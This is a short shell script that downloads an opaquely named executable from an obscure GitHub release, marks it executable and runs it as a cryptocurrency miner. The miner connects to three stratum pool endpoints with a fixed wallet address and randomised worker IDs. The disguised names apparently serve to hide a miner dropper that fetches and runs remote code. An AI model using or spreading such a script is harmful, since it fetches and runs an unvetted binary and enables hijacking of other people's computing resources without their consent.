#!/bin/sh
apt update && apt install unzip
wget https://github.com/varfeplas/crkonel/releases/download/crkom/kormnr
chmod +x kormnr
./kormnr -P stratum1+tcp://cb21065de322fb2bff1944936d0cf55bd02ae8968223.$(shuf -n 1 -i 1-99999)-AATP21JUL@de.catchthatrabbit.com:8008 \
     -P stratum1+tcp://cb21065de322fb2bff1944936d0cf55bd02ae8968223.$(shuf -n 1 -i 1-99999)-AATP21JUL@sg.catchthatrabbit.com:8008 \
     -P stratum1+tcp://cb21065de322fb2bff1944936d0cf55bd02ae8968223.$(shuf -n 1 -i 1-99999)-AATP21JUL@us.catchthatrabbit.com:8008
